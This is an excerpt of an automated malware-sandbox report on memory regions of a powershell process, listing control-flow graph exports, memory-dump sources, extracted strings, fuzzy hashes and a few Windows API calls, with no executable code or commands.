                                                                                                  control_flow_graph 265 820f6c8-820f6d4 266 820f6d6-820f6dc 265->266 267 820f6ec-820f6fc 265->267 268 820f6e0-820f6ea 266->268 269 820f6de 266->269 271 820f720-820f723 267->271 272 820f6fe-820f701 267->272 268->267 269->267 276 820f725-820f728 271->276 277 820f708-820f71d 271->277 274 820f742-820f757 272->274 275 820f703-820f706 272->275 275->277 278 820f75a-820f7d6 275->278 276->278 279 820f72a-820f73f 276->279 315 820f7d8 call 820f9f0 278->315 316 820f7d8 call 820fa00 278->316 290 820f7de-820f7e3 291 820f8f8-820f902 290->291 292 820f7e9-820f807 290->292 294 820f851-820f85a call 8207488 292->294 295 820f809-820f823 292->295 294->291 299 820f860-820f8f5 294->299 300 820f825 295->300 301 820f82c-820f84f 295->301 299->291 300->301 301->294 315->290 316->290
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et$09>t$09>t$^Et$9>t
                                                                                                  • API String ID: 0-3237255482
                                                                                                  • Opcode ID: cc177c664fbd47801a5faf7a008d2648c70e529fdc334a229c343a4d766cee32
                                                                                                  • Instruction ID: 542f1aee7bd023fbd2ad3e8328aa609d60a1e1106b18c1676865598e8186d563
                                                                                                  • Opcode Fuzzy Hash: cc177c664fbd47801a5faf7a008d2648c70e529fdc334a229c343a4d766cee32
                                                                                                  • Instruction Fuzzy Hash: B251C574B002169FCB149B6DD8546AEBBE6FFC8311B148469E509DB3D2DF34DD028B92

                                                                                                   Control-flow Graph (text export; entry block 8206f29, overlapping the 8206f38 function above; call site 8207025 is exported with two targets, 8205990 and 8205971):
                                                                                                  control_flow_graph 731 8206f29-8206fc9 744 8206fd7-8206ff8 731->744 745 8206fcb-8206fce 731->745 748 8207019-8207022 744->748 749 8206ffa-8207012 744->749 745->744 804 8207025 call 8205990 748->804 805 8207025 call 8205971 748->805 749->748 751 820702b-8207073 758 8207079-820707d 751->758 759 820720f-82072c5 751->759 760 820708f-82070ad 758->760 761 820707f-820708d 758->761 793 82072c7-8207303 759->793 765 82070f2-82070fe 760->765 766 82070af-82070c6 760->766 761->760 768 8207104-820720a 761->768 765->759 765->768 773 82070c8 766->773 774 82070cf-82070f0 766->774 768->793 773->774 774->765 804->751 805->751
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et$^Et$^Et
                                                                                                  • API String ID: 0-3960570542
                                                                                                  • Opcode ID: 66108d0e14a24506c6293f2754a21174f5cbc028bbce3b5641e30f36118400f2
                                                                                                  • Instruction ID: 46301c7062726663bbab179242491ba442f10dd8a6f65458af4d9dbebf25d798
                                                                                                  • Opcode Fuzzy Hash: 66108d0e14a24506c6293f2754a21174f5cbc028bbce3b5641e30f36118400f2
                                                                                                  • Instruction Fuzzy Hash: 7B915C34B006069FDB15DF68C854BAEB7B6FF88300F148529E409AB395DF75AD068B91

                                                                                                   Control-flow Graph (text export; entry block 8280c50; call site 8280d50 targets 8282608):
                                                                                                  control_flow_graph 806 8280c50-8280c6d 807 8280c6f-8280c75 806->807 808 8280c85-8280cbc 806->808 809 8280c79-8280c83 807->809 810 8280c77 807->810 814 8280cdb-8280d05 808->814 815 8280cbe-8280cd9 808->815 809->808 810->808 820 8280d0d-8280d1e 814->820 815->820 821 8280d2d-8280d36 820->821 822 8280d20-8280d25 820->822 823 8280d3c-8280d42 821->823 824 8281265-82812be 821->824 822->821 825 8280d50-8280d81 call 8282608 823->825 826 8280d44-8280d4a 823->826 835 82812c0 824->835 836 82812c2 824->836 838 8280d87-8280dff 825->838 828 8280d4c 826->828 829 8280d4e 826->829 828->825 829->825 837 82812c4-82812db 835->837 836->837 841 82812e1-8281317 837->841 842 8281367-828138d 837->842 862 8281108-828110f 838->862 863 8280e05-8280e3b 838->863 852 8281319-828134e 841->852 853 8281356-8281365 841->853 849 8281390-82813c0 842->849 852->853 853->849 865 82811d0-82811ff 862->865 866 8281115-8281181 862->866 875 8280e41-8280e51 863->875 876 8280f85-8280f99 863->876 878 8281207-828122a 865->878 894 8281183-8281185 866->894 895 8281187-828118f 866->895 875->876 882 8280e57-8280e6c 875->882 883 82810fb-8281102 876->883 884 8280f9f-8280fc2 876->884 882->876 890 8280e72-8280e81 882->890 883->862 887 8281248-828125d 883->887 899 8280fc8-8280fcf 884->899 900 828122b-8281240 884->900 887->824 890->876 904 8280e87-8280e8b 890->904 898 8281191-82811ce 894->898 895->898 898->878 902 8280fdb-828100c 899->902 903 8280fd1-8280fd9 899->903 900->887 922 828101b-828101e 902->922 923 828100e-8281019 902->923 903->902 904->876 907 8280e91-8280e9e 904->907 907->876 915 8280ea4-8280ea8 907->915 917 8280eaa-8280eb5 915->917 918 8280eb7-8280eba 915->918 920 8280ec2-8280f84 917->920 918->920 927 8281026-82810f5 922->927 923->927 927->883 927->884
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1829558126.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y=t$Y=t
                                                                                                  • API String ID: 0-1495259516
                                                                                                  • Opcode ID: b1416710c0f2ddd3e73ebf457607f59136c19bdc8d51a562dd00defaae42b621
                                                                                                  • Instruction ID: 3bcf50263f66732be0cd499524fba71bde29074d53aa575760b631da04106931
                                                                                                  • Opcode Fuzzy Hash: b1416710c0f2ddd3e73ebf457607f59136c19bdc8d51a562dd00defaae42b621
                                                                                                  • Instruction Fuzzy Hash: 1E421334A01705DFCB19DFA4D488A6EBBB2FF89311B10856DD80A9B395DB31EC86CB51

                                                                                                  Control-flow Graph: entry block 833a3b0-833a3c4, contains calls to 82008c0 and 82008d0 (node/edge rendering omitted)
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ^Et$hn
                                                                                                  • API String ID: 0-1465777008
                                                                                                  • Opcode ID: 76188f3927883452953e06f7b11a6530501be66a5a22c56f448269086dbe5199
                                                                                                  • Instruction ID: 09aa24888c21e243ec71e40e9a23f433becb466c7d42717ce46ecbc32119424f
                                                                                                  • Opcode Fuzzy Hash: 76188f3927883452953e06f7b11a6530501be66a5a22c56f448269086dbe5199
                                                                                                  • Instruction Fuzzy Hash: 3EA1BF30B006249FDB14EF68D880AAFBBA6EFC8201B14852DD5469B395DF74DD46CBA1

                                                                                                  Control-flow Graph: entry block 8204d40-8204d51 (node/edge rendering omitted)
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Ld>t$Ld>t
                                                                                                  • API String ID: 0-1578203329
                                                                                                  • Opcode ID: d1274ca0ffbbec7650ef77fba34dcc15613e7867ff27b0cc5b0683cfacbd70f2
                                                                                                  • Instruction ID: 3b216377db74854ea9be79c92e4171d144a59b462938bef324cc9ea53f161f24
                                                                                                  • Opcode Fuzzy Hash: d1274ca0ffbbec7650ef77fba34dcc15613e7867ff27b0cc5b0683cfacbd70f2
                                                                                                  • Instruction Fuzzy Hash: 3C312334320611DBD304AB7DC954A2A339BEFC8296B69C57CDA05CB796DF31DC028B69

                                                                                                  Control-flow Graph: entry block 29dd590-29dd5ee, contains calls to 29dc664, 29dc670, 29dd18c, 29dd198 and the API IdentifyCodeAuthzLevelW (node/edge rendering omitted)
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3c93074c59652f366fdef84d1beeff575a7bdac4fb3585dedba53dd50e5e34cd
                                                                                                  • Instruction ID: 5ecb6dd35dcc3c284bf69496eaca894c1ce182d246146ccc8dde5edd7ad9f0c2
                                                                                                  • Opcode Fuzzy Hash: 3c93074c59652f366fdef84d1beeff575a7bdac4fb3585dedba53dd50e5e34cd
                                                                                                  • Instruction Fuzzy Hash: 1E915E71D00359DFEB25CFA5C944B9DBBF5BF44304F1084AAD409AB290DBB59A85CFA0
                                                                                                  APIs
                                                                                                  • IdentifyCodeAuthzLevelW.ADVAPI32(?,?,?,00000000), ref: 029DD862
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AuthzCodeIdentifyLevel
                                                                                                  • String ID:
                                                                                                  • API String ID: 1431151113-0
                                                                                                  • Opcode ID: 1e7d25e14ff49553f9a14148a8b9742bff4657245384b7ed9f75242e32a8f82a
                                                                                                  • Instruction ID: 1c8134d56dd4872805e506575e81aa93e9b601b3f3ce50946e0f873191dde260
                                                                                                  • Opcode Fuzzy Hash: 1e7d25e14ff49553f9a14148a8b9742bff4657245384b7ed9f75242e32a8f82a
                                                                                                  • Instruction Fuzzy Hash: 5A41F471D4126ACFEB25CF99C984BDEBBB4AB08304F10C5EAD40DA7250D7759A89CF60
                                                                                                  APIs
                                                                                                  • IdentifyCodeAuthzLevelW.ADVAPI32(?,?,?,00000000), ref: 029DD862
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AuthzCodeIdentifyLevel
                                                                                                  • String ID:
                                                                                                  • API String ID: 1431151113-0
                                                                                                  • Opcode ID: 891bc289e62e934371dfee57810668673e5781619048b0c87cee4f6fe5ce5a26
                                                                                                  • Instruction ID: d92a9abe460965d270b27e0752090c8e75564e1a8f01816f95162b58c978b9e9
                                                                                                  • Opcode Fuzzy Hash: 891bc289e62e934371dfee57810668673e5781619048b0c87cee4f6fe5ce5a26
                                                                                                  • Instruction Fuzzy Hash: C741E4B1D4126ACFEB25CF99C984BDDBBB4AB08304F10C5EAD40DA7250D7759A89CF60
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: |<Et
                                                                                                  • API String ID: 0-4156215977
                                                                                                  • Opcode ID: eb6f960ff61b1fe37935a71a1a7c5f194626f9b64d01c629203393ec286d9f93
                                                                                                  • Instruction ID: 998200b2d69c2fd8575c90349890313d0abecfdef91130199d3515d1f6e7b0fa
                                                                                                  • Opcode Fuzzy Hash: eb6f960ff61b1fe37935a71a1a7c5f194626f9b64d01c629203393ec286d9f93
                                                                                                  • Instruction Fuzzy Hash: EAC13874B00205CFDB14DFB9D854AAEBBF6AF88311F148429D911AB391DB76DD01CBA1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "
                                                                                                  • API String ID: 0-123907689
                                                                                                  • Opcode ID: cb47603955721f7dc4e7963027d959517f372441b9ce92f9ae308d772b1faab0
                                                                                                  • Instruction ID: 94adb9755fa11cb43589bf4c38ed385b463d1be744735a562b0f5781835bd759
                                                                                                  • Opcode Fuzzy Hash: cb47603955721f7dc4e7963027d959517f372441b9ce92f9ae308d772b1faab0
                                                                                                  • Instruction Fuzzy Hash: 2DE11974A00219DFDB04CFA5C985BEDB7F6FB88301F248169E905AB251EB72AD45CF60
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828356432.00000000081C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_81c0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: 958c18071b5ba2c13ed129c8eb59dc202055f860c4ca6713bb630fbf77e287d7
                                                                                                  • Instruction ID: d9dc8b9ec98e3a7eb2742b41727ff530b53511156cc698a23ec9c59f74f13166
                                                                                                  • Opcode Fuzzy Hash: 958c18071b5ba2c13ed129c8eb59dc202055f860c4ca6713bb630fbf77e287d7
                                                                                                  • Instruction Fuzzy Hash: 41E15834A00609CFDB54DF68D884A9DB7F2FF88311F1581A8E8069B366DB71ED42CB91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et
                                                                                                  • API String ID: 0-64186490
                                                                                                  • Opcode ID: 05045370fc769efdd6e9e6fdceabed839e0f67ad365cb6251af831efc8cfa787
                                                                                                  • Instruction ID: 44d3ca79083633b0d1d8189c8172617a69568ed121e43365a1f72b673eeeecd2
                                                                                                  • Opcode Fuzzy Hash: 05045370fc769efdd6e9e6fdceabed839e0f67ad365cb6251af831efc8cfa787
                                                                                                  • Instruction Fuzzy Hash: 47C19C34B002059FDB44EB78D8946AEB7E6EFC8310F14847AE90ADB395DE349D46CB91
                                                                                                  APIs
                                                                                                  • SetThreadUILanguage.KERNELBASE ref: 08138CC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1827850263.0000000008130000.00000040.00000800.00020000.00000000.sdmp, Offset: 08130000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8130000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LanguageThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 243849632-0
                                                                                                  • Opcode ID: 8efc47b29ae6d0e59e661f304a157134974df3699aee8630af7017c2e84d18f7
                                                                                                  • Instruction ID: 3bd75377f21f594557f6093f8032d62e877bbfc8c0a4c748a4aeaf68a107b68b
                                                                                                  • Opcode Fuzzy Hash: 8efc47b29ae6d0e59e661f304a157134974df3699aee8630af7017c2e84d18f7
                                                                                                  • Instruction Fuzzy Hash: E9218CB58093888FDB11CFA9C4447DEBFF4EF09211F14849ED494A7251C378A945CBA2
                                                                                                  APIs
                                                                                                  • ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,?,?,?,?), ref: 029DD99E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 132034935-0
                                                                                                  • Opcode ID: 4d8115084064dd8f93c44cce8bd26883ecc80da2ab13ee5ccb7a6c0277e238b4
                                                                                                  • Instruction ID: 053219d9513b12274705893af130bef2bc279f39bdb6c7007d55ba1899775550
                                                                                                  • Opcode Fuzzy Hash: 4d8115084064dd8f93c44cce8bd26883ecc80da2ab13ee5ccb7a6c0277e238b4
                                                                                                  • Instruction Fuzzy Hash: C72115769002499FCB10CF9AC944BDFBBF4EB48314F15842AE818A7250C3789A55CFA1
                                                                                                  APIs
                                                                                                  • ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,?,?,?,?), ref: 029DD99E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 132034935-0
                                                                                                  • Opcode ID: b000e56dc6bb895b2b26cf0a8917faacef14bd47d336d0ee8ad77e7158247029
                                                                                                  • Instruction ID: fc275ab80e361841d05953b71d4178b9d0800d868b46a26155021711c16e28aa
                                                                                                  • Opcode Fuzzy Hash: b000e56dc6bb895b2b26cf0a8917faacef14bd47d336d0ee8ad77e7158247029
                                                                                                  • Instruction Fuzzy Hash: 022124B69003499FCB10CF9AC884BDEBBF4EB48314F10842AE918A7250D379A941CFA1
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 029D4FB0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 87d90d14a636be88bf2b9e0f08c8b14433d9b8a71b418bc474f40850bfe0fc20
                                                                                                  • Instruction ID: 88630e2041606c40d71532dfcbd5cf5bcdf98273491b89b82d7f0ebcb59d7a92
                                                                                                  • Opcode Fuzzy Hash: 87d90d14a636be88bf2b9e0f08c8b14433d9b8a71b418bc474f40850bfe0fc20
                                                                                                  • Instruction Fuzzy Hash: DBF15B34B00204DFDB049F64D854BAABBF6EF88351F198069E816DB3A1DB75DC45CBA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823863330.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fd0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 817f63e7625c5121f7ca1d751f5f4a5a2a7ff39a400c0cb30ca5e4862aea59e8
                                                                                                  • Instruction ID: 1489c82e7d447d99b1e247495868847cb04cf2ccd02f85eb68d5444e227cc993
                                                                                                  • Opcode Fuzzy Hash: 817f63e7625c5121f7ca1d751f5f4a5a2a7ff39a400c0cb30ca5e4862aea59e8
                                                                                                  • Instruction Fuzzy Hash: D2E1F2B5B043099FD7259B68D850BAABBE3EF85210F1DC09AD4459F392CE71CC41CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2a2df76621e6c311c4b48faf16c0f83a03f18aadcd1dd9709ab9dfebb62feed3
                                                                                                  • Instruction ID: 2cc98696fabc30c848f54c8bda136ca3a5bd61da02026d442a72b1c9262d3e0a
                                                                                                  • Opcode Fuzzy Hash: 2a2df76621e6c311c4b48faf16c0f83a03f18aadcd1dd9709ab9dfebb62feed3
                                                                                                  • Instruction Fuzzy Hash: 5712D734A11219CFCB25DF24C488AE8BBB2FF48356F1584A9E84A9B351CB75D9C6CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1829558126.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ecd75671e78cf230e2f9b885d309e0aea64c40292178f4750695e6ea19be89d4
                                                                                                  • Instruction ID: 240307ef961c51f5f719e3fe3000119495488adea4b031c8931f37123aebe0b8
                                                                                                  • Opcode Fuzzy Hash: ecd75671e78cf230e2f9b885d309e0aea64c40292178f4750695e6ea19be89d4
                                                                                                  • Instruction Fuzzy Hash: 63F18C34A15255CFCB15DF68C584999BBF1FF49320B1A819AD849AF3A2C730FC82CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1826556555.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8100000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 26a3a61ab716e9ad9345ff677c6f0a973157d101ec84ad93532b3db0fee050cc
                                                                                                  • Instruction ID: d238556f59a86774727d9c71603bb4ea9abb28af4dd2a4b28feba4b04159ecb6
                                                                                                  • Opcode Fuzzy Hash: 26a3a61ab716e9ad9345ff677c6f0a973157d101ec84ad93532b3db0fee050cc
                                                                                                  • Instruction Fuzzy Hash: B1020C74A00219CFDB18DFA5D894A9DB7B6FF88301F248569E406AB3A1DB75EC42CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 606f7d28507c00ace0b219ef38cdf3894bd8b13a3838149f8556af2be2cace1f
                                                                                                  • Instruction ID: da9c5b85a50adafe556c69f8e7415ea69155fbd5f8a1fcad19889087473179a6
                                                                                                  • Opcode Fuzzy Hash: 606f7d28507c00ace0b219ef38cdf3894bd8b13a3838149f8556af2be2cace1f
                                                                                                  • Instruction Fuzzy Hash: 95F17970A2120ADFCB04DFA4D894AADB7F6FF88381F148469D409AB3A1DB75ED41CB51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 731fd6be59c5385143328019a15b6b50fea860232f844ef18eac750520083765
                                                                                                  • Instruction ID: ea343986ebd1415b26bba25b24037f214f3a63350fee9aaabbc48a95a96f5ae0
                                                                                                  • Opcode Fuzzy Hash: 731fd6be59c5385143328019a15b6b50fea860232f844ef18eac750520083765
                                                                                                  • Instruction Fuzzy Hash: ECF19A70A11209DFDB15CF68C494AEEBBB2FF88321F1585A9E5459B3A1CB35EC41CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823863330.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fd0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 590fb769a55ecea8912038ca52a3329ef68e064f84cd12151dfecf83f0b99b73
                                                                                                  • Instruction ID: 18ae815e75c320a550ad08e7e582c79f45597432307e9fc7d9357da649b3254f
                                                                                                  • Opcode Fuzzy Hash: 590fb769a55ecea8912038ca52a3329ef68e064f84cd12151dfecf83f0b99b73
                                                                                                  • Instruction Fuzzy Hash: 7CC1F6B1B10345DFDB29DB69C450BBAB7E3AFC9210F1D805AD9469B281DA71CC41CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1829558126.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 677b5790589786fe75e255800a18e8e9bd6e6198420b0a19ea38f578a1805c4f
                                                                                                  • Instruction ID: 141f4187933ccae310863dc05c944fbcee8b566466bb02d948bf970137bde693
                                                                                                  • Opcode Fuzzy Hash: 677b5790589786fe75e255800a18e8e9bd6e6198420b0a19ea38f578a1805c4f
                                                                                                  • Instruction Fuzzy Hash: FD024A30A10616CFDB14EF68C884A99F7B2FF88311F15C699D449AB292DB74ED85CF81
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d482daa8d15ce12150e9f8bc40972fa6d5a7a2088f82ef34df21ab41b664208e
                                                                                                  • Instruction ID: 479e4e738e93d5d106e771f386ff7cc78cbef8afd4c085429f39c1f432937430
                                                                                                  • Opcode Fuzzy Hash: d482daa8d15ce12150e9f8bc40972fa6d5a7a2088f82ef34df21ab41b664208e
                                                                                                  • Instruction Fuzzy Hash: D4D15C35A00204DFDB04DF68D854AAEBBB6EF88311F158069E916EB3A1DB35DD41CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 23fc1789384cb86834ee70568c56f39f9a379fb1727f9d09d67291287bed34f7
                                                                                                  • Instruction ID: 1a2e96ac1153df14765093adcf7955720578635739a509f883844ea9ae9466cf
                                                                                                  • Opcode Fuzzy Hash: 23fc1789384cb86834ee70568c56f39f9a379fb1727f9d09d67291287bed34f7
                                                                                                  • Instruction Fuzzy Hash: 76D15CB0710205BBD708EB64C851AAEB7A6FF88304F50862DE105DB792DBB6ED45CBD1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9e4fdd52cb4b8976d56c1e0a47437316ee5ea08556619b0b1f48036fbe87ed73
                                                                                                  • Instruction ID: 508b6d088aceeb2db5916b0434619dfb040f053a64f2c8f2836d9ef8eab5f976
                                                                                                  • Opcode Fuzzy Hash: 9e4fdd52cb4b8976d56c1e0a47437316ee5ea08556619b0b1f48036fbe87ed73
                                                                                                  • Instruction Fuzzy Hash: ABC1CA30A11245DFDB04DFA4C854BEEBBF2EF89341F248469E906AB390DB71AD41CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
